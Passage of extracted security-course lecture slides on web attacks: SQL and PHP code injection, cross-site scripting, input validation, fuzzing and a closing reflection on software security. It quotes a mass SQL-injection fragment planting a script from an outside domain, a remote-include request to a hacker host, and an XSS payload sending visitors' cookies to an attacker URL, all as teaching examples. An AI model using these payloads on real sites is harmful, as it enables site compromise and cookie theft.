(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script
src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM
Table_Cursor INTO @T'@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor

• Redirects to malicious domain where 8 different

browser exploits are launched
CIS 433/533: Computer and Network Security

8

Code Injection
• further variant
• input includes code that is then executed
‣ see PHP remote code injection vulnerability
• variable + global field variables + remote include

‣ this type of attack is widely exploited
<?php
include $path . 'functions.php';
include $path . 'data/prefs.php';
GET /calendar/embed/day.php?path=http://hacker.web.site/hack.txt?&cmd=ls

CIS 433/533: Computer and Network Security

Cross Site Scripting Attacks
• attacks where input from one user is later output to

another user
• XSS commonly seen in scripted web apps
‣ with script code included in output to browser
‣ any supported script, e.g. Javascript, ActiveX
‣ assumed to come from application on site

• XSS reflection
‣ malicious code supplied to site
‣ subsequently displayed to other users
CIS 433/533: Computer and Network Security

XSS Example
• guestbooks, wikis, blogs etc
• where comment includes script code
‣ e.g. to collect cookie details of viewing users

• need to validate data supplied
‣ including handling various possible encodings

• attacks both input and output handling

Thanks for this information, its great!
<script>document.location='http://hacker.web.site/cookie.cgi?'+
document.cookie</script>

CIS 433/533: Computer and Network Security

Validating Input Syntax
• to ensure input data meets assumptions
‣ e.g. is printable, HTML, email, userid etc

• compare to what is known acceptable
• not to known dangerous
‣ as can miss new problems, bypass methods

• commonly use regular expressions
‣ pattern of characters describe allowable input
‣ details vary between languages

• bad input either rejected or altered
CIS 433/533: Computer and Network Security

Input Fuzzing
• powerful testing method using a large range of

randomly generated inputs
‣ to test whether program/function correctly handles

abnormal inputs
‣ simple, free of assumptions, cheap
‣ assists with reliability as well as security

• can also use templates to generate classes of

known problem inputs
‣ could then miss bugs, so use random as well

CIS 433/533: Computer and Network Security

Wrapup
• So, what does it all mean?

CIS 433/533: Computer and Network Security

14

The state of security
• … issues are in public consciousness
‣ Press coverage is increasing …
‣ Losses mounting … (billions and billions)
‣ Affect increasing …… (ATMs, commerce)
‣ Public is at risk ....

• What are we doing?

“… sound and fury signifying nothing …”
(well, its not quite that bad)

CIS 433/533: Computer and Network Security

15

The problems …
• What is the root cause?
‣ Security is not a key goal ...

... and it never has been...
... so, we need to figure out how to
change the way we do engineering
(and science) ...
... to make computers secure.
• Far too much misunderstanding about basic security

and the use of technology (security theatre)

CIS 433/533: Computer and Network Security

16

The current solutions …
• Make better software


“we mean it” - B. Gates (2002)



“no really …” - B. Gates (2003)



“Linux/OS X/Sun OS etc. is bad too …” - B. Gates (2005)



“Vista will fix everything” - B. Gates (2006)



“Vista fixes everything” - B. Gates (2007)



“Sorry about Vista ....” - B. Gates (2007.5)



“Windows 7.0 will fix everything” - B. Gates (2008)

• CERT/SANS-based problem/event tracking


Experts tracking vulnerabilities



Patch system completely broken

• Destructive research


Back-pressure on product developers



Arms-race with bad guys

• Problem: reactive, rather than proactive
CIS 433/533: Computer and Network Security

17

The real solutions …
• Fix the economic incentive equation …
‣ Eventually, MS/Sun/Apple/*** will be in enough pain

that they change the way they make software

• Education
‣ Things will get better when people understand when

how to use technology

• Fix engineering practices
‣ Design for security

• Apply technology
‣ What we have been talking about
CIS 433/533: Computer and Network Security

18

Your new skills arsenal
• “A little knowledge is a dangerous thing”

• More and more, real lives at stake through

subverting computers
• “With great power comes great

responsibility”

CIS 433/533: Computer and Network Security

19

The bottom line
• The Web/Internet and new technologies have

limited ability to address security and privacy
concerns …
• … computer science is making the world less

safe!!
• … it is incumbent on us as scientists to meet these

challenges.
‣ Evangelize importance of security …
‣ Provide sound technologies …
‣ Define better practices …
CIS 433/533: Computer and Network Security

20

Thank You!!!

Computer and Information Science

Sponsor Documents

Or use your account on DocShare.tips

Hide

Forgot your password?

Or register your new account on DocShare.tips

Hide

Lost your password? Please enter your email address. You will receive a link to create a new password.

Back to log-in

Close